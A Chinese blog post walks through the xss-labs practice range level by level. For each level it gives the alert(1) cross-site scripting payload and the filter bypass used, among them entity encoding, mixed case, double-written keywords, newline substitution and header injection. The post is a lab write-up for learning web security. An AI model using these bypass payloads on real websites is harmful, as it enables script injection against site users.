xss-labs靶场通关总结

最新推荐文章于 2024-07-13 21:44:32 发布
最新推荐文章于 2024-07-13 21:44:32 发布
阅读量249 收藏 1
点赞数
分类专栏: 靶场 文章标签: xss javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62621015/article/details/128936495
版权

xss-labs靶场实战总结(其实没有完全通关:(   ),我边过关边打的word文档,顺手贴上来。

本人也只是出于兴趣学习一下这方面的知识,文章涉及的知识点难免有些错漏,望海涵

1 / 随便payload都可以,没有防御

Payload·:

<script>  alert(1)</script>

2 / keyword可用,闭合value

Payload:

 " type="button" onclick=“alert(1)

3-4 /  双引号被实体化了,但单引号没有被实体化,利用单引号闭合。

Payload: 

  ' onmouseover=javascript:alert(1)  '

注意后面那个单引号要隔空

5 /  过滤on ,script ,以及大小写  。 利用http  <a>标签 href属性:当标签<a>被点击的时候,就会触发执行转跳,上面是转跳到一个网站,我们还可以触发执行一段js代码 (js伪协议)

Payload:

  "><a href=javascript:alert(1)>sss</a>

点击sss过关

6 /  过滤了href标签,但没有过滤大小写

Payload:  

 "><a hrEf=javascript:alert(1)>sss</a>

7 / 删除on ,script , href以及过滤大小写 , 双写绕过

Payload: 

  "><a hrehreff=javascrscriptipt:alert()>sss</a>

8 /  过滤了script,on,src,data,href 。发现输入的值插入了两地方,其中一个为:

href有一个隐藏属性,为自动Unicode解码,可以利用Unicode编码绕过

javascript:alert()   ->payload:  

  &#106;&#97;&#118;&#97;&#115;&#99;&#114;

&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

9 / 此关过滤的字符与第八关一致,而且多增加了一个strpos函数,该函数检查插入语句是否含有’http://’ ,因此payload与第八关一样需要编码,但’http://’不编码

javascript:alert(‘http://’)   ->

payload: 

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;'http://')

10  /  查看源码后发现,输入的keyword其实没卵用,被实体化后无法构造payload,只做输出。真正有利用价值的是下面的隐藏输入,但str33也无法使用<>

Payload:

  ?keyword=nul&t_sort=" type="button" onclick="alert(1)

payload补齐后语句为:

<input name="t_sort"  value=" "  type="button" οnclick="alert(1)" type="hidden">

11 /   根据源码,通过keyword传参str被实体化无法构建payload;可通过t_sort传参,但是t_sort双引号被实体化,闭合不了;只有后面的t_ref字段可用。已知str33由referer字段传入,因此直接通过HackBar修改referer(不知道为什么使用bp拦截修改后onclick点击不了,可能是我不太会用),使用的payload和上一关相似,只不过是通过referer传输

Payload:

" type="text" onmouseover="alert(1)

12  /  查看网页代码可知t_ua字段通过user_agent获得,其余与上一关一样,通过user_agent字段传输

Payload:

" type="text" onmouseover="alert(1)

13  / 查看网页代码发现cookie字段,查看源代码后得知cookie传输格式为user=xxx,其余同上

Payload:  

 user=" type="text" onmouseover="alert(1)

14  / 未解之谜

15 /  查看源码,发现只有ng-include可利用。

搜索发现,该函数用于包含外部的HTML文件。

  ng-include用法:

 因此可通过src向其传递参数,利用之前含有xss漏洞的关卡将xss漏洞包含进来

Payload:

php?name=<a href ="javascript:alert(1)">sss</a>'

点击sss标签过关

16 / 查看源码发现script,space,/都被过滤了,但在html中,space可用回车代替,url编码的回车为%0a

Payload:

 <img%0Asrc="1"%0Aonerror=alert(1)>%0a

17 / 搜索发现embed用于嵌入多媒体,但火狐没法加载swf图片,所以我把源码改了,直接用前面的png,反正原理一样的。构建payload闭合语句

Payload:

arg01= onmouseover=alert(1)&arg02=b

鼠标移到png上面触发

18 / 跟17关一样

19 20/ 看网上说要对flash反编译, 不会,不做了

tips:

(1) Htmlspecialchars 如果只有一个参数str,则将< > “ 实体化,单引号不编码

(2)关键字测试:   " ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()>

川川小宝
关注
专栏目录
xss-labs靶场总结(持续更新)
<XiaoHai>的博客
06-17 317
web安全
xss_labs 漏洞平台靶场练习 总结 wp
Alexhirchi的博客
08-11 2931
每日学习 每日持续更新ing~ 文章目录xss漏洞什么是xssXSS分类构造xss思路靶场练习level1level2level3level4level5level6level7level8level9level10 xss漏洞 什么是xss xss(Cross Site Script),跨站脚本攻击 网页内嵌入HTML,CSS,JS代码 此漏洞也是网站存在相当多的漏洞,仅次于SQL注入,攻击者可以使用XSS来绕过访问控制,如同源策略。利用XSS可以窃取账号,网页挂马,发动拒绝服务攻击,发送垃圾邮件等.
XSS-labs 靶场通关总结(下)
m0_61506558的博客
08-12 389
原理。
新手打 XSS-level(1-13) 靶场心得和总结
最新发布
m0_73992753的博客
07-13 1079
新手学习 XSS-level(1-13)练级
xss-libs靶场总结
qq_59023242的博客
11-24 129
js里面的ng-include和php里面include,一样的作用。包含第2关,get传参,用经典xss代码发现被实体化,再尝试用事件型。被实体化,尝试编码绕过,也不行。先判断,其余3个参数能否传参。想办法包含其他关卡,进行弹框。查看网页源代码,发现了。隐藏框:hidden。传参点:t_sort。
xss-labs靶场通关
10-13
xss-labs靶场通关 本篇文章将对xss-labs靶场的六关源码进行详细的分析和总结,并对每一关的xss攻击payload进行解释。 第一关 xss-labs靶场的第一关源码没有做任何过滤,直接上xss payload:<script>alert("XSS")...
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
xss-labs靶场
newlife1441的博客
07-29 888
靶场搭建,可以从Github上下载或者直接下载下面的资源入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https。......
xss-labs靶场实战通关教程】
AuroraMiraitowa的博客
03-09 1177
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
xssgame靶场通关记录
qq_43936524的博客
02-04 655
靶场地址 国光老师修改以后的项目地址 解压后放入HTTP服务的目录下,浏览器打开。 第一关 没有任何防护 payload: <script>alert('xss')</script> 第二关 测试语句: <>"JavAScriPT'/:on; 查看网页源码: 没有找到和&lt;&gt;&quot;JavAScriPT'/:on;相关的结果. 输入的字符串经过htmlspecialchars($str)编码,< > "被转义为html
跨站脚本攻击XSS(最全最细致的靶场实战)
热门推荐
m0_51468027的博客
01-31 4万+
一、XSS跨站漏洞 (1)XSS简介   网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting,安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS)有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。恶意攻击者会在 Web页面里插入恶意Script代码,当用户浏览该页之时,嵌.
xss实验并对注入点、注入语句及危害知识总结
五分之一世纪
03-25 1786
<1>xss的概念 xss的英文名字是cross site script。俗称跨站脚本,是一种注入攻击,指攻击者在被攻击的网页上利用编写时的漏洞注入恶意脚本代码,受害者访问该页面时,恶意代码会在用户的浏览器上执行的攻击方式叫做跨域脚本攻击。看xss的名字——“跨域脚本攻击”,思索名字可以发现“跨域”,那么什么是域?跨了什么域?其实这个域是指域名,在web中规定脚本只能在本域名上的不同路径上的文件中执行,而不能在不同域上执行,这个措施的实现就是根据同源策略。下面先用一个实验对xss的攻击流程做一个
xss-labs-master过关心得
Ays.Ie的博客
11-03 1897
xss-labs-master通关心得
编码在XSS中的应用
Cwillchris的博客
07-10 789
一、使用编码绕过过滤-进行 XSS 注入1、Stage #15 十六进制绕过Stage #15 地址: https://xssquiz.int21h.jp/stage__15.php?sid=bdebf58d6cee62495a283af53d445e874dcfcad0输入的信息会在页面下方的黑色文本框中显示。尝试直接注入 payload: ">alert(document.dodomainmain);输入的双引号和左右尖括号全部转义成了实体字符编码。使用十六进制进行绕...
xss靶场挑战之旅总结
weixin_43027842的博客
02-10 3947
第一关: 没有做任何的过滤 我们试下 第二关: 我们用&quot;&amp;gt; 有转义 参考HTML的转义 输入的 &quot; &amp;gt; &amp;lt; 被做了转义处理,变成了&quot;&amp;gt;&amp;lt; 我们用javascript里边的oninput事件试试 我们用12’ oninput='alert(12) 第四关; 做了过滤 用&quot;oninput=&q
xss-labs靶场打靶记录
AnistonH的博客
11-26 1667
(小声说一句,这部分也是偷的)检测输入变量,确认每个 web 页面中用户可自定义的变量,如 HTTP 参数、POST 数据、隐藏表单字段值、预定义的 radio 值或选择值分别确认每个输入变量是否存在 xss漏洞。变量输入处输入 poc,查看返回的 web页面的 html 中 poc 代码是否被过滤,浏览器是否响应 poc,若存在过滤,进行测试查看能否进行绕过。攻:利用<>标记,构造<script>标签可执行 javascriptxss代码。防:xss过滤函数需过滤等字符。
使用XSS自动上传表单文件的例子
fjh1997的博客
05-12 250
仅供渗透测试,禁止他用。方案二:iframe。
XSS-labs通关
bring_coco的博客
05-27 851
Level1 分析服务器源码 看到上图的两处还比较有用,意思是只要弹出弹框就会自动到下一关,同时记录payload的长度,因此是无过滤我们直接构造payload Payload:name=<script>alert(/xss/)</script> 直接进入第二关 Level2 简单尝试 发现没有起作用反而完整的显示在页面中,因此推断输入的语句被实体化了,我们分析服务器源码看看 可以看到htmlspecialchars() htmlspecialchars()作用:把预定义
实验31:xss之htmlspecialchars绕过演示
qq_44720671的博客
04-29 2180
htmlspecialchars绕过 htmlspecialchars()函数把预定义字符转换成HT,L实体 预定义字符为: 1、& (和 )&amp(编码) 2、” (双引号)&qupt 3、’ (单引号)&#039 4、< (小于) &It 5、> (大于) &gt 可用引号类型: ENT_COMPAT—默认,仅编码双引号 ENT...
xss-labs靶场通关详解
08-26
对不起,我无法提供有关特定靶场 "xss-labs" 的详细通关解释,因为我无法直接访问互联网或搜索特定的信息。然而,XSS(跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者将恶意的脚本注入到网页中,从而获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值